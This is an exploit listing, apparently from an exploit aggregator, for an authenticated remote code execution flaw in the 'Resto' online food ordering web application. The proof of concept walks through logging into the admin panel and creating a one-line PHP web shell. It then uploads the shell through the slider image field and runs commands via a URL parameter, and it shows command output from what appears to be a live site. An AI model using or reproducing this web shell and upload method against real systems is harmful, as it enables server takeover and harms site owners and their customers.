Exploit for Resto - Single Vendor Online Food Ordering Shell Upload

## https://sploitus.com/exploit?id=PACKETSTORM:189546
Title: Resto - Single Vendor Online Food Ordering - Authenticated RCE
    
    Description: Resto Single Vendor Online
    
    Source URL: https://res.newmedilife.in/admin
    
    Source Name/Email: Mehmet Can Kadıoğlu a.k.a mao7un
    
    CVEs: N/A
    
    Software URL: https://www.codester.com/items/53350/resto-single-vendor-online-food-ordering-website
    
    
    PoC:
    
    1. Log in to the admin panel using the credentials.
    
    2. Navigate to the "Sliders" tab on the victim's website (/admin/slider/).
    
    3. Add a new slider.
    
    4. Create a web shell on the attacker's machine by executing the following
    command:
    
    echo "<?php system($_GET['cmd']);?>" > cmd.php
    5. Upload the web shell through the "Image" input field.
    
    6. Copy the image path and execute a command using the following URL:
    
    https://[target]/storage/app/public/admin-assets/images/slider/slider-67c459d300218.php?cmd=id
    
    uid=4204(newmedil) gid=4206(newmedil) groups=4206(newmedil)